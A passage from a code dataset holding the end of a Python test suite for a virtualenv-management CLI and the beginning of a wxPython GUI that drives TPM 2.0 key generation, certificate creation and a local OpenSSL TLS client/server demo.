file = NamedTemporaryFile(delete=False)
self.addCleanup(os.remove, file.name)
mtime = os.path.getmtime(file.name)
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), f"""
[virtualenv.a]
post-commands = [
["false"],
["touch", "{file.name}"],
]
""",
)
self.run_cli(["converge"])
self.assertEqual(os.path.getmtime(file.name), mtime)
def test_bundles(self):
self.assertFalse(self.locator.for_name("a").exists_on(self.filesystem))
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[bundle]
dev = ["bar", "bla"]
[virtualenv.a]
install = ["foo"]
install-bundle = ["dev"]
""",
)
self.run_cli(["converge"])
self.assertEqual(
self.installed(self.locator.for_name("a")),
({"foo", "bar", "bla"}, set()),
)
def test_modifying_a_bundle_recreates_envs_using_it(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[bundle]
dev = ["bar"]
[virtualenv.a]
install-bundle = ["dev"]
""",
)
self.run_cli(["converge"])
self.assertEqual(
self.installed(self.locator.for_name("a")),
({"bar"}, set()),
)
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[bundle]
dev = ["bar", "baz"]
[virtualenv.a]
install-bundle = ["dev"]
""",
)
self.run_cli(["converge"])
self.assertEqual(
self.installed(self.locator.for_name("a")),
({"bar", "baz"}, set()),
)
def test_no_such_bundle(self):
self.assertFalse(self.locator.for_name("a").exists_on(self.filesystem))
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
install = ["foo"]
install-bundle = ["dev"]
""",
)
self.run_cli(["converge"])
self.assertEqual(
self.installed(self.locator.for_name("a")),
(set(), set()),
)
def test_it_does_not_blow_up_by_default_on_install(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
[virtualenv.b]
[virtualenv.magicExplodingVirtualenvOnInstall]
[virtualenv.c]
""",
)
self.run_cli(["converge"])
self.assertEqual(
(
self.installed(self.locator.for_name("a")),
self.installed(self.locator.for_name("b")),
self.installed(self.locator.for_name("c")),
self.locator.for_name("c").exists_on(self.filesystem),
),
tuple((set(), set()) for _ in "abc") + (True,),
)
self.assertIn(
"'magicExplodingVirtualenvOnInstall' failed",
self.stderr.getvalue(),
)
def test_it_can_be_asked_to_blow_up_immediately_on_install(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
[virtualenv.b]
[virtualenv.magicExplodingVirtualenvOnInstall]
[virtualenv.c]
""",
)
with self.assertRaises(ZeroDivisionError):
self.run_cli(["converge", "--fail-fast"])
self.assertEqual(
(
self.installed(self.locator.for_name("a")),
self.installed(self.locator.for_name("b")),
self.locator.for_name("c").exists_on(self.filesystem),
),
((set(), set()), (set(), set()), False),
)
def test_it_does_not_blow_up_by_default_on_create(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
[virtualenv.b]
[virtualenv.magicExplodingVirtualenvOnCreate]
[virtualenv.c]
""",
)
self.run_cli(["converge"])
self.assertEqual(
(
self.installed(self.locator.for_name("a")),
self.installed(self.locator.for_name("b")),
self.installed(self.locator.for_name("c")),
self.locator.for_name("c").exists_on(self.filesystem),
),
tuple((set(), set()) for _ in "abc") + (True,),
)
self.assertIn(
"'magicExplodingVirtualenvOnCreate' failed",
self.stderr.getvalue(),
)
def test_it_can_be_asked_to_blow_up_immediately_on_create(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
[virtualenv.b]
[virtualenv.magicExplodingVirtualenvOnCreate]
[virtualenv.c]
""",
)
with self.assertRaises(ZeroDivisionError):
self.run_cli(["converge", "--fail-fast"])
self.assertEqual(
(
self.installed(self.locator.for_name("a")),
self.installed(self.locator.for_name("b")),
self.locator.for_name("c").exists_on(self.filesystem),
),
((set(), set()), (set(), set()), False),
)
def test_specified_python(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
python = "python3"
""",
)
self.run_cli(["converge"])
# FIXME: this doesn't properly assert about the python version...
self.assertEqual(
self.installed(self.locator.for_name("a")),
(set(), set()),
)
def test_custom_link_dir(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link = ["foo"]
""",
)
link_dir = self.link_dir.descendant("some", "child", "bin")
self.run_cli(["converge", "--link-dir", str(link_dir)])
self.assertEqual(
self.filesystem.readlink(link_dir / "foo"),
self.locator.for_name("a").binary("foo"),
)
def test_link_exists(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link = ["foo"]
""",
)
self.filesystem.touch(self.link_dir.descendant("foo"))
with self.assertRaises(FileExists):
self.run_cli(["converge"])
def test_link_exists_as_broken_symlink(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link = ["foo"]
""",
)
self.filesystem.link(
source=self.link_dir.descendant("broken"),
to=self.link_dir.descendant("foo"),
)
self.run_cli(["converge"])
self.assertEqual(
self.linked,
{"foo": self.locator.for_name("a").binary("foo")},
)
def test_conflicting_links(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link = ["foo"]
[virtualenv.b]
[virtualenv.c]
link = ["foo"]
""",
)
with self.assertRaises(_config.DuplicatedLinks) as e:
self.run_cli(["converge"])
self.assertIn("foo", str(e.exception))
self.assertEqual(self.linked, {})
def test_conflicting_links_via_rename(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link = ["foo"]
[virtualenv.b]
[virtualenv.c]
link = ["bar:foo"]
""",
)
with self.assertRaises(_config.DuplicatedLinks) as e:
self.run_cli(["converge"])
self.assertIn("foo", str(e.exception))
self.assertEqual(self.linked, {})
def test_specified_link_name(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link = ["foo:fooBar"]
""",
)
self.run_cli(["converge"])
self.assertEqual(
self.linked,
{"fooBar": self.locator.for_name("a").binary("foo")},
)
def test_missing_link_dir(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link = ["foo"]
""",
)
self.filesystem.remove_empty_directory(self.link_dir)
self.assertFalse(self.filesystem.is_dir(path=self.link_dir))
self.run_cli(["converge"])
self.assertEqual(
self.linked,
{"foo": self.locator.for_name("a").binary("foo")},
)
def test_link_m_module(self):
"""
It links modules run via -m as wrappers.
"""
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link-module = ["this"]
""",
)
self.run_cli(["converge"])
contents = self.filesystem.get_contents(
self.link_dir.descendant("this"),
)
self.assertEqual(
contents.splitlines()[0],
"#!" + str(self.locator.for_name("a").binary("python")),
)
def test_link_m_module_specified_name(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link-module = ["this:that"]
""",
)
self.run_cli(["converge"])
contents = self.filesystem.get_contents(
self.link_dir.descendant("that"),
)
self.assertEqual(
contents.splitlines()[0],
"#!" + str(self.locator.for_name("a").binary("python")),
)
def test_link_m_module_duplicated(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link = ["foo"]
[virtualenv.b]
[virtualenv.c]
link-module = ["bar:foo"]
""",
)
with self.assertRaises(_config.DuplicatedLinks) as e:
self.run_cli(["converge"])
self.assertIn("foo", str(e.exception))
self.assertEqual(self.linked, {})
def test_link_m_module_replaces_generated_files(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link-module = ["this"]
""",
)
self.run_cli(["converge"])
# Just change the config in a way that will re-converge
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link-module = ["this", "that"]
""",
)
self.run_cli(["converge"])
def test_link_m_module_does_not_replace_non_venvs_wrappers(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link-module = ["this"]
""",
)
self.filesystem.touch(self.link_dir.descendant("this"))
with self.assertRaises(FileExists):
self.run_cli(["converge"])
def test_linking_the_same_binary_twice(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link = ["this:that", "this"]
""",
)
self.run_cli(["converge"])
this = self.locator.for_name("a").binary("this")
self.assertEqual(self.linked, dict(this=this, that=this))
def test_changing_a_bundle_recreates_the_venv(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[bundle]
one = ["foo"]
[virtualenv.a]
install-bundle = ["one"]
""",
)
self.run_cli(["converge"])
self.assertEqual(
self.installed(self.locator.for_name("a")),
({"foo"}, set()),
)
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[bundle]
one = ["foo", "bar"]
[virtualenv.a]
install-bundle = ["one"]
""",
)
self.run_cli(["converge"])
self.assertEqual(
self.installed(self.locator.for_name("a")),
({"foo", "bar"}, set()),
)
def test_missing_config_recreates_the_venv(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
""",
)
self.run_cli(["converge"])
venv = self.locator.for_name("a")
self.filesystem.remove_file(venv.path / "installed.json")
some_random_file = venv.path / "some-random-file"
self.filesystem.touch(some_random_file)
self.assertTrue(self.filesystem.is_file(some_random_file))
# Now the file should disappear as the venv gets recreated
self.run_cli(["converge"])
self.assertFalse(self.filesystem.is_file(some_random_file))
def test_invalid_config_recreates_the_venv(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
""",
)
self.run_cli(["converge"])
venv = self.locator.for_name("a")
self.filesystem.set_contents(
venv.path / "installed.json",
"not even json",
)
some_random_file = venv.path / "some-random-file"
self.filesystem.touch(some_random_file)
self.assertTrue(self.filesystem.is_file(some_random_file))
# Now the file should disappear as the venv gets recreated
self.run_cli(["converge"])
self.assertFalse(self.filesystem.is_file(some_random_file))
def test_valid_json_invalid_config_recreates_the_venv(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
""",
)
self.run_cli(["converge"])
venv = self.locator.for_name("a")
self.filesystem.set_contents(venv.path / "installed.json", "{}")
some_random_file = venv.path / "some-random-file"
self.filesystem.touch(some_random_file)
self.assertTrue(self.filesystem.is_file(some_random_file))
# Now the file should disappear as the venv gets recreated
self.run_cli(["converge"])
self.assertFalse(self.filesystem.is_file(some_random_file))
| 31.026354
| 79
| 0.541928
| 2,110
| 21,191
| 5.267299
| 0.092891
| 0.090067
| 0.070542
| 0.090696
| 0.862786
| 0.851719
| 0.84713
| 0.829944
| 0.826075
| 0.819507
| 0
| 0.000343
| 0.31301
| 21,191
| 682
| 80
| 31.071848
| 0.763086
| 0.015573
| 0
| 0.694853
| 0
| 0.001838
| 0.262804
| 0.013248
| 0
| 0
| 0
| 0.001466
| 0.117647
| 1
| 0.056985
| false
| 0
| 0.012868
| 0
| 0.071691
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
77f4d8e31ca9285fb421b901b1ef230bdf3961cd
| 62,750
|
py
|
Python
|
Python_TPM20_GUI/tab3_engine.py
|
RaymWong/optiga-tpm-explorer
|
9a05849205784c4540f22d757f521092c86f2135
|
[
"MIT"
] | 1
|
2022-02-09T20:46:05.000Z
|
2022-02-09T20:46:05.000Z
|
Python_TPM20_GUI/tab3_engine.py
|
RaymWong/optiga-tpm-explorer
|
9a05849205784c4540f22d757f521092c86f2135
|
[
"MIT"
] | null | null | null |
Python_TPM20_GUI/tab3_engine.py
|
RaymWong/optiga-tpm-explorer
|
9a05849205784c4540f22d757f521092c86f2135
|
[
"MIT"
] | 1
|
2022-02-15T02:36:28.000Z
|
2022-02-15T02:36:28.000Z
|
import wx
import shell_util as exec_cmd
import multiprocessing
import time
import os
import subprocess
from subprocess import call
import images as img
import time
# from wx.lib.pubsub import setuparg1
# from wx.lib.pubsub import pub as Publisher
from pubsub import pub as Publisher
import threading
from threading import Thread
import signal
import ctypes
"""
Already done: The creation of the server and CA keypairs, CA self-signed certificate. RSA miscellaneous functions and hashing are okay already.
TO-DO: Get the start_client/start_server and write_client/write_server functions to work. The aim of the two tabs are to:
Display a client and server process that connect to each other using the TPM commands.
Additionally show connectivity by sending messages from client/server and showing that the message appears in the server/client.
Running subprocess does not block the UI, however, sending messages through the PIPE in subprocess does block the UI.
The main issue here is the many methods of sending messages to the client/server processes are blocking (the UI).
"""
# index 0, 1 respectively
rng_type_list = ['hex', 'base64']
server_proc = None
server_thread=None
client_proc = None
client_thread=None
server_log = None
client_log = None
RSA_Server_thread_active_flag=0
RSA_Client_thread_active_flag=0
ecc_server_proc = None
ecc_server_thread=None
ecc_client_proc = None
ecc_client_thread=None
ECC_Server_thread_active_flag=0
ECC_Client_thread_active_flag=0
def ServerProcess(server_log):
global server_proc
if (server_proc is not None):
try:
server_proc.terminate()
except OSError:
server_proc = None
#server_proc = exec_cmd.createProcess("openssl s_server -cert CAsigned_rsa_cert.crt -accept 4433 -keyform engine -engine tpm2tss -key rsa_server.tss", server_log)
server_proc = exec_cmd.createProcess("lxterminal --command='openssl s_server -cert CAsigned_rsa_cert.crt -accept 4433 -keyform engine -engine tpm2tss -key rsa_server.tss'", server_log)
def ClientProcess(client_log):
global client_proc
if (client_proc is not None):
try:
client_proc.terminate()
except OSError:
client_proc = None
client_proc = exec_cmd.createProcess("lxterminal --command='openssl s_client -connect localhost:4433 -tls1_2 -CAfile CA_rsa_cert.pem'", client_log)
def LogReader(text_server, text_client, server_log, client_log):
print(("server log is: " + str(server_log)))
print(("client log is: " + str(client_log)))
print(("text_server is: " + str(text_server)))
print(("text_client is: " + str(text_client)))
time.sleep(2)
server_log.seek(0)
client_log.seek(0)
while (True):
line_client = client_log.readline()
if (line_client != ''):
text_client.AppendText(line_client + "\n")
line_server = server_log.readline()
if (line_server != ''):
text_server.AppendText(line_server + "\n")
# check and kill the processes if they are still running
def checkProcesses():
global server_proc, client_proc, server_log, client_log
if (server_proc is not None):
try:
server_proc.terminate()
except OSError:
server_proc = None
if (client_proc is not None):
try:
client_proc.terminate()
except OSError:
client_proc = None
if (server_log is not None):
server_log.close()
if (client_log is not None):
client_log.close()
def kill_child_processes(parent_pid, sig=signal.SIGTERM):
ps_command = subprocess.Popen("ps -o pid --ppid %d --noheaders" % parent_pid, shell=True, stdout=subprocess.PIPE)
ps_output = ps_command.stdout.read()
retcode = ps_command.wait()
#assert retcode == 0, "ps command returned %d" % retcode
if (retcode==0):
for pid_str in ps_output.split("\n".encode())[:-1]:
os.kill(int(pid_str), sig)
else:
print("ps command returned %d" % retcode)
class RSA_Server_Thread(threading.Thread):
def __init__(self, threadID, Process):
global RSA_Server_thread_active_flag
threading.Thread.__init__(self)
self.threadID = threadID
self.Process = Process
self.daemon= True
RSA_Server_thread_active_flag=1
def run(self):
global RSA_Server_thread_active_flag,server_proc
try:
while RSA_Server_thread_active_flag==1 :
line = self.Process.stdout.readline()
if line != '':
wx.CallAfter(Publisher.sendMessage, "Server_Text", msg=line)
#os.write(1, line)
#print line
#else:
# break
finally:
RSA_Server_thread_active_flag=0
print("Exit RSA server Thread")
wx.CallAfter(Publisher.sendMessage, "Server_Text", msg="Server Stopped..\n")
def get_id(self):
# returns id of the respective thread
if hasattr(self, '_thread_id'):
return self._thread_id
for id, thread in list(threading._active.items()):
if thread is self:
print("thread ID")
print(id)
return id
def raise_exception(self):
thread_id = self.get_id()
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(thread_id,ctypes.py_object(SystemExit))
if res > 1:
ctypes.pythonapi.PyThreadState_SetAsyncExc(thread_id, 0)
print('Exception raise failure')
class RSA_Client_Thread(threading.Thread):
def __init__(self, threadID, Process):
global RSA_Client_thread_active_flag
threading.Thread.__init__(self)
self.threadID = threadID
self.Process = Process
self.daemon= True
RSA_Client_thread_active_flag=1
def run(self):
global RSA_Client_thread_active_flag,client_proc
while RSA_Client_thread_active_flag==1 :
line = self.Process.stdout.readline()
if line != '':
wx.CallAfter(Publisher.sendMessage, "Client_Text", msg=line)
#else:
# break
RSA_Client_thread_active_flag=0
#self.Process.terminate()
#self.Process.wait()
#client_proc=None
print("Exit RSA client Thread")
wx.CallAfter(Publisher.sendMessage, "Client_Text", msg="Client Stopped..\n")
class Tab_RSA_CS(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
# declare the sizers
mainsizer = wx.BoxSizer(wx.HORIZONTAL)
steps_sizer = wx.BoxSizer(wx.VERTICAL)
server_sizer = wx.BoxSizer(wx.VERTICAL)
client_sizer = wx.BoxSizer(wx.VERTICAL)
# instantiate the objects
button_gen_ca = wx.Button(self, -1, 'Generate CA && CA Cert', size = (-1, 48))
button_gen_keypair = wx.Button(self, -1, 'Create Keypair (for server)', size = (-1, 48))
button_gen_csr = wx.Button(self, -1, 'Create CSR', size = (-1, 48))
button_gen_cert = wx.Button(self, -1, 'Create Server Cert', size = (-1, 48))
button_start_server = wx.Button(self, -1, 'Start/Stop Server')
button_start_client = wx.Button(self, -1, 'Start/Stop Client')
button_write_from_server = wx.Button(self, -1, 'Write to Client')
button_write_from_client = wx.Button(self, -1, 'Write to Server')
button_flush_client = wx.Button(self, -1, 'Clear client text', size = (-1, 48))
button_flush_server = wx.Button(self, -1, 'Clear server text', size = (-1, 48))
self.text_client = wx.TextCtrl(self, -1, style=(wx.TE_MULTILINE | wx.TE_READONLY))
self.text_client.SetFont(wx.Font(12, wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
self.text_server = wx.TextCtrl(self, -1, style=(wx.TE_MULTILINE | wx.TE_READONLY))
self.text_server.SetFont(wx.Font(12, wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
self.input_client = wx.TextCtrl(self, -1,value="Send from Client")
self.input_server = wx.TextCtrl(self, -1,value="Send from Server")
backimage = wx.Image('../images/back.png', wx.BITMAP_TYPE_PNG).ConvertToBitmap()
backbutton = wx.BitmapButton(self, -1, backimage)
# ~backbutton = wx.BitmapButton(self, -1, img.back.getBitmap())
# attach the sizers to the main sizer
mainsizer.Add(steps_sizer, 0, wx.EXPAND | wx.LEFT | wx.TOP | wx.BOTTOM, 5)
mainsizer.Add(server_sizer, 1, wx.EXPAND | wx.RIGHT | wx.TOP | wx.BOTTOM, 5)
mainsizer.Add(client_sizer, 1, wx.EXPAND | wx.RIGHT | wx.TOP | wx.BOTTOM, 5)
# attach the objects to the sizers
steps_sizer.Add(button_gen_ca, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.Add(button_gen_keypair, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.Add(button_gen_csr, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.Add(button_gen_cert, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.Add(button_flush_server, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.Add(button_flush_client, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.AddSpacer(236)
steps_sizer.Add(backbutton, 0, wx.ALL, 5)
server_sizer.Add(self.text_server, 1, wx.EXPAND | wx.ALL, 5)
server_sizer.Add(button_start_server, 0, wx.EXPAND | wx.ALL, 5)
server_sizer.Add(self.input_server, 0, wx.EXPAND | wx.ALL, 5)
server_sizer.Add(button_write_from_server, 0, wx.EXPAND | wx.ALL, 5)
client_sizer.Add(self.text_client, 1, wx.EXPAND | wx.ALL, 5)
client_sizer.Add(button_start_client, 0, wx.EXPAND | wx.ALL, 5)
client_sizer.Add(self.input_client, 0, wx.EXPAND | wx.ALL, 5)
client_sizer.Add(button_write_from_client, 0, wx.EXPAND | wx.ALL, 5)
# Set tooltips
button_gen_ca.SetToolTip(wx.ToolTip("Generate Key Pair and Self-Signed Certificate for the Certificate Authority (CA)."))
button_gen_keypair.SetToolTip(wx.ToolTip("Generate Key Pair for the Server."))
button_gen_csr.SetToolTip(wx.ToolTip("Generate Certificate Signing Request (CSR) for the CA, from the Server's private key."))
button_gen_cert.SetToolTip(wx.ToolTip("Generate Server Certificate from the CSR and the CA's private key."))
# declare and bind events
self.Bind(wx.EVT_BUTTON, self.OnFlushClient, button_flush_client)
self.Bind(wx.EVT_BUTTON, self.OnFlushServer, button_flush_server)
self.Bind(wx.EVT_BUTTON, self.OnGenCA1, button_gen_ca)
self.Bind(wx.EVT_BUTTON, self.OnGenKeyPair1, button_gen_keypair)
self.Bind(wx.EVT_BUTTON, self.OnGenCSR1, button_gen_csr)
self.Bind(wx.EVT_BUTTON, self.OnGenCert, button_gen_cert)
self.Bind(wx.EVT_BUTTON, self.OnStartServer, button_start_server)
self.Bind(wx.EVT_BUTTON, self.OnStartClient, button_start_client)
self.Bind(wx.EVT_BUTTON, self.OnWriteServer, button_write_from_server)
self.Bind(wx.EVT_BUTTON, self.OnWriteClient, button_write_from_client)
self.Bind(wx.EVT_BUTTON, self.OnBack, backbutton)
# Setup Publisher for text field update
Publisher.subscribe(self.Upd_Server_Status, "Server_Text")
Publisher.subscribe(self.Upd_Client_Status, "Client_Text")
self.server_multiproc = None
self.client_multiproc = None
self.log_reader_multiproc = None
self.SetSizer(mainsizer)
def Upd_Server_Status(self,msg):
self.text_server.AppendText(msg)
def Upd_Client_Status(self,msg):
self.text_client.AppendText(msg)
def OnFlushClient(self, evt):
self.text_client.Clear()
def OnFlushServer(self, evt):
self.text_server.Clear()
# Calling parent of the parent, as direct parent is the notebook,
# then the second parent is the frame, from which we call the destruction
def OnBack(self, evt):
#~ global server_proc,client_proc,RSA_Server_thread_active_flag,RSA_Client_thread_active_flag
#~ if (server_proc is not None):
#~ RSA_Server_thread_active_flag=0
#~ if (client_proc is not None):
#~ RSA_Client_thread_active_flag=0
#~ print "Client Thread Active..killing it: %d \n" % client_proc.pid
#~ kill_child_processes(client_proc.pid)
#~ client_proc.terminate()
#~ client_proc.wait()
#~ client_proc = None
#~ print "Server Thread Active..killing it: %d \n" % server_proc.pid
#~ kill_child_processes(server_proc.pid)
#~ #server_proc.stdin.write("stop\n")
#~ #server_thread.raise_exception()
#~ #server_thread.join()
#~ server_proc.terminate()
#~ server_proc.wait()
#~ server_proc = None
self.Parent.Parent.OnCloseWindow(None)
def Destroy(self):
global server_proc,client_proc,RSA_Server_thread_active_flag,RSA_Client_thread_active_flag
if (server_proc is not None):
RSA_Server_thread_active_flag=0
if (client_proc is not None):
RSA_Client_thread_active_flag=0
print("Client Thread Active..killing it: %d \n" % client_proc.pid)
kill_child_processes(client_proc.pid)
client_proc.terminate()
client_proc.wait()
client_proc = None
print("Server Thread Active..killing it: %d \n" % server_proc.pid)
kill_child_processes(server_proc.pid)
server_proc.terminate()
server_proc.wait()
server_proc = None
def OnGenCA1(self, evt):
self.text_server.AppendText("Generating CA key-pair...\n")
wx.CallLater(10, self.OnGenCA)
def OnGenCA(self):
exec_cmd.execCLI(["rm", "rsa_CA.tss", ])
exec_cmd.execCLI(["rm", "CA_rsa_cert.pem", ])
exec_cmd.execCLI(["rm", "rsa_server.tss", ])
exec_cmd.execCLI(["rm", "server_rsa.csr", ])
exec_cmd.execCLI(["rm", "CAsigned_rsa_cert.crt", ])
if (exec_cmd.ownerAuth !=""):
f = open("temp.conf", "w+")
f.write(exec_cmd.openssl_cnf)
f.close()
exec_cmd.execCLI([
"tpm2tss-genkey",
"-a", "rsa",
"-o",exec_cmd.ownerAuth,
"rsa_CA.tss",
])
self.text_server.AppendText("'tpm2tss-genkey -a rsa -o %s rsa_CA.tss'\n" % exec_cmd.ownerAuth)
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
self.text_server.AppendText("Creating Self-Signed Certificate:\n")
cmd =" openssl req -config temp.conf -key rsa_CA.tss -new -x509 -days 7300 -sha256 -engine tpm2tss -keyform engine -out CA_rsa_cert.pem -subj '/C=SG/ST=Singapore/L=Singapore/O=Infineon Technologies/OU=DSS/CN=TPMEvalKitCA'"
ps_command = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
command_output = ps_command.stdout.read()
retcode = ps_command.wait()
else:
exec_cmd.execCLI([
"tpm2tss-genkey",
"-a", "rsa",
"rsa_CA.tss",
])
self.text_server.AppendText("Generating CA key-pair: 'tpm2tss-genkey -a rsa rsa_CA.tss'\n" )
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
self.text_server.AppendText("Creating Self-Signed Certificate:\n")
cmd =" openssl req -key rsa_CA.tss -new -x509 -days 7300 -sha256 -engine tpm2tss -keyform engine -out CA_rsa_cert.pem -subj '/C=SG/ST=Singapore/L=Singapore/O=Infineon Technologies/OU=DSS/CN=TPMEvalKitCA'"
ps_command = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
command_output = ps_command.stdout.read()
retcode = ps_command.wait()
self.text_server.AppendText(str(command_output))
self.text_server.AppendText(str(cmd)+"\n")
#~ self.text_server.AppendText("openssl req -key rsa_CA.tss -new -x509 -days 7300 -sha256 -engine tpm2tss -keyform engine -extensions v3_ca -out CA_rsa_cert.pem -subj '/C=SG/ST=Singapore/L=Singapore/O=Infineon Technologies/OU=DSS/CN=TPMEvalKitCA'\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnGenKeyPair1(self, evt):
self.text_server.AppendText("Generating SERVER key-pair...\n")
wx.CallLater(10, self.OnGenKeyPair)
def OnGenKeyPair(self):
if (exec_cmd.ownerAuth !=""):
exec_cmd.execCLI([
"tpm2tss-genkey",
"-o",exec_cmd.ownerAuth,
"-a", "rsa",
"rsa_server.tss",
])
self.text_server.AppendText("'tpm2tss-genkey -o %s -a rsa rsa_server.tss'\n" %exec_cmd.ownerAuth)
else:
exec_cmd.execCLI([
"tpm2tss-genkey",
"-a", "rsa",
"rsa_server.tss",
])
self.text_server.AppendText("Generating SERVER key-pair: 'tpm2tss-genkey -a rsa rsa_server.tss'\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnGenCSR1(self, evt):
self.text_server.AppendText("Creating Certificate Signing Request...\n")
wx.CallLater(10, self.OnGenCSR)
def OnGenCSR(self):
if (exec_cmd.ownerAuth !=""):
f = open("temp.conf", "w+")
f.write(exec_cmd.openssl_cnf)
f.close()
#~ self.text_server.AppendText("Creating Certificate Signing Request:\n")
command_output = exec_cmd.execCLI([
"openssl",
"req", "-new",
"-config","temp.conf",
"-engine", "tpm2tss",
"-key", "rsa_server.tss",
"-keyform", "engine",
"-subj", "/CN=TPM_UI/O=Infineon/C=SG",
"-out", "server_rsa.csr",
])
self.text_server.AppendText(str(command_output))
self.text_server.AppendText("openssl req -new -config temp.conf -engine tpm2tss -key rsa_server.tss -keyform engine -subj /CN=TPM_UI/O=Infineon/C=SG -out server_rsa.csr\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
else:
command_output = exec_cmd.execCLI([
"openssl",
"req", "-new",
"-engine", "tpm2tss",
"-key", "rsa_server.tss",
"-keyform", "engine",
"-subj", "/CN=TPM_UI/O=Infineon/C=SG",
"-out", "server_rsa.csr",
])
self.text_server.AppendText(str(command_output))
self.text_server.AppendText("openssl req -new -engine tpm2tss -key rsa_server.tss -keyform engine -subj /CN=TPM_UI/O=Infineon/C=SG -out server_rsa.csr\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnGenCert(self, evt):
self.text_server.AppendText("Creating Server Certificate...\n")
if (exec_cmd.ownerAuth !=""):
f = open("temp.conf", "w+")
f.write(exec_cmd.openssl_cnf)
f.close()
openssl_cmd="OPENSSL_CONF=temp.conf openssl x509 -req -in server_rsa.csr -CA CA_rsa_cert.pem -CAkey rsa_CA.tss -engine tpm2tss -CAkeyform engine -out CAsigned_rsa_cert.crt -days 365 -sha256 -CAcreateserial"
server_proc = exec_cmd.createProcess(openssl_cmd, server_log)
#~ command_output = exec_cmd.execCLI([
#~ "OPENSSL_CONF=temp.conf", "openssl", "x509",
#~ "-req", "-in", "server_rsa.csr",
#~ "-CA","CA_rsa_cert.pem",
#~ "-CAkey", "rsa_CA.tss", "-engine tpm2tss",
#~ "-CAkeyform", "engine",
#~ "-out", "CAsigned_rsa_cert.crt",
#~ "-days", "365", "-sha256", "-CAcreateserial",
#~ ])
#~ self.text_server.AppendText(str(command_output))
self.text_server.AppendText("OPENSSL_CONF=temp.conf openssl x509 -req -in server_rsa.csr -CA CA_rsa_cert.pem -CAkey rsa_CA.tss -engine tpm2tss -CAkeyform engine -out CAsigned_rsa_cert.crt -days 365 -sha256 -CAcreateserial\n")
else:
command_output = exec_cmd.execCLI([
"openssl",
"req", "-x509", "-sha256",
"-engine", "tpm2tss",
"-key", "rsa_CA.tss",
"-keyform", "engine",
"-in", "server_rsa.csr",
"-out", "CAsigned_rsa_cert.crt",
])
self.text_server.AppendText(str(command_output))
self.text_server.AppendText("openssl req -x509 -sha256 -key rsa_CA.tss -engine tpm2tss -keyform engine -in server_rsa.csr -out CAsigned_rsa_cert.crt\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnStartServer(self, evt):
global server_proc,client_proc,server_log
global server_thread
